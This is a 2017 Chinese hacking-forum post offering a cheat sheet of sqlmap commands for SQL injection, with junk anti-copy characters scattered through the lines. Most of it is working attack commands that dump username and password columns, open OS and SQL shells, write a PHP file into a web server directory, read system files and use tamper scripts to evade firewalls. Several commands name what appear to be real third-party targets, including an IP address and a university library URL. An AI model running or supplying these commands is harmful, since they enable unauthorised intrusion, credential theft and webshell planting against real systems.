找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1817|回复: 0
打印 上一主题 下一主题

sqlmap使用实例

[复制链接]
跳转到指定楼层
楼主
发表于 2017-5-19 17:03:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/pentest/database/sqlmap7 R$ G2 ]5 P$ Z" p

; ~& S9 L: D$ X. s; p" a* l& k+ supdate :::::>     in the folder   after  execute    following   order : svn update
' M# J* D! ?6 O; L4 L5 j, Z0 t2 \1 q/ c, n
sqlmap.py -r 1.txt --current-db6 q. j* F2 l9 R* ^) B  T
) P! G/ F9 S$ i. Z. j0 y4 D, n
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
' ~5 ^9 b; P, V# u: S' X7 m: A! O: t0 P
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1)) # h! p$ \! |7 c! o6 v  r: U
猜解数据库
3 O; d3 s, Z  y% f1 V2 H4 I2 U% X* e./sqlmap.py -u "injection-url" --dbs
& Q, u) z+ f+ F) O( ]* jsqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
9 h% O) Y/ V$ C& ]& n' m! o- J. l' h
猜解表名8 O6 [' D# u3 n( V/ C
./sqlmap.py -u "injection-url" -D database_name --tables
. Y5 T; q+ ^6 z2 I+ V" R  j6 y: z0 u& v8 U& |$ V5 l
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"2 {/ Z, ^# O7 b8 G' T3 E
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
5 E2 |* W+ o# b0 ^: T+ \
9 q3 K2 g9 }! A! }* v3 Msqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
* P& V9 ~3 o& [; ?- Q7 w
0 x7 x/ w" m! A$ ]4 Q7 k+ R3 Vsqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"* \# b4 e: a- _; q7 {- ]# E/ j
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"$ i7 g' N. J6 v2 `: G9 z
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py" 4 h2 X) w5 O4 E* n6 m( `, F
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
( s7 [$ t$ ]; @0 L- Z' m4 y
( x! b* x" m- ]1 b6 d/ P' W7 ssqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py", a3 K- z* M, ]2 y; Y/ u+ m( t, {# o3 t  O4 d
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
6 i8 p+ W/ T" h7 m( x+ [/ dsqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
8 t) D+ x/ T5 \. F& k/ W" a3 q' Ksqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py": @& o" ]( g3 {+ j
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
2 ]7 w% j2 ?. p; ]' U& j
( E3 W+ O! C5 q# Xsqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了! k! Z7 K+ l) e* e8 o9 `6 e
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
* t: J; t" I, e" g1 P& ~( ]
5 }7 s, G, p: |4 s% u- |, [sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"% C  d! I+ L2 P7 f! i
猜解列名/ z$ _: B% R; P% ^. n3 D5 g
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
# Q( R/ g/ i; {: e, r) U& F* u: C  x: E- j- D! a1 ^
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py" 8 ~" a- p6 f5 G- _0 A
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
: M0 A5 G, T: bsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"3 A0 Z, {7 i6 o% A0 X# ?
1 T+ ^  |! e) r0 L  F# e* k) G
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
# B6 s1 a. n7 f3 m2 X( f- l# Q% r5 J# K&submit=Go7 l% c( \/ G& k" A* x' m% h
猜解值' y/ J2 [1 n) k9 Z$ I, x) u
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
# @% j# z, g( U6 V+ D, V# g; e7 T" w========================================================6 U4 m+ g4 G9 b2 j; v4 `  d
搜索表名中包括mana字符的
4 g) n6 J+ @  Y$ I) ?/sqlmap.py -u "injection-url" -T mana --search
* @& @7 \0 K! a- v返回一个交互式sql shell! N+ ]) |( y4 X! w
/sqlmap.py -u "injection-url" --sql-shell
( w9 h4 A( _: b$ N, w" u/ n读取指定文件(需权限)4 l0 A$ I' ]3 W0 W# k" [$ v
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
/ N& ?* K8 H  q查看当前 用户 及 数据库 ( f# Y# O! c& ~# }- O4 w- J
/sqlmap.py -u "injection-url" --current-user --current-db
# ~: M" {+ I  r; I! _9 p* e本地文件 写入 远程目标绝对路径
  l1 e# j3 B6 t3 Y( K/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
6 |4 A2 G2 m0 psqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py" # R: c- P- n0 w4 P: A9 ^

. H# T+ c# w) `4 J+ X/ i1 O' _sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径: V3 n+ D$ _7 H' p' b: U' e, s
查看某用的权限
3 [' e' F5 G/ b6 ?/sqlmap.py -u "injection-url" --privileges -U root4 N# X* \* v  {3 f+ C5 K
查看当前用户是否为dba) B4 _& U% d! R+ q
/sqlmap.py -u "injection-url" --is-dba
" F& r6 s) W/ |( g$ ?' O3 b读取所有数据库用户或指定数据库用户的密码
4 Z+ N6 V, E- o' i% Csqlmap.py -r 1.txt --users --passwords
+ X5 v5 R6 \% u+ ]' q9 o- M5 Esqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
0 q8 _0 c9 W9 ^* @6 c. g/ r1 |
& s, E1 R: D3 G$ Y/ y6 _/sqlmap.py -u "injection-url" --passwords -U root
& X1 m/ h  h' ^- G$ V2 ]6 D. B2 X3 X+ }
--start&&--stop 与 --first&&--last 的区别
* u" c( _9 P* b  q5 |1 k! G/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
, x; m, b2 l1 p. B1 U! W$ c" S! b* ^" u" k9 E
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)9 i, s# _7 n1 p
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
; h0 A5 h/ A3 x' B7 A. `; Y( \/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
2 y; Z7 k+ d! A# F) B8 D$ h: d! }
2 V" T( I" M$ [, J) u1 v, g" g执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)4 m. W9 _; C5 x4 N4 i( }  A
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
$ X7 Z" ~5 R: A: J  T% p
+ ~& \: w6 l" A. S7 d0 \6 M
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表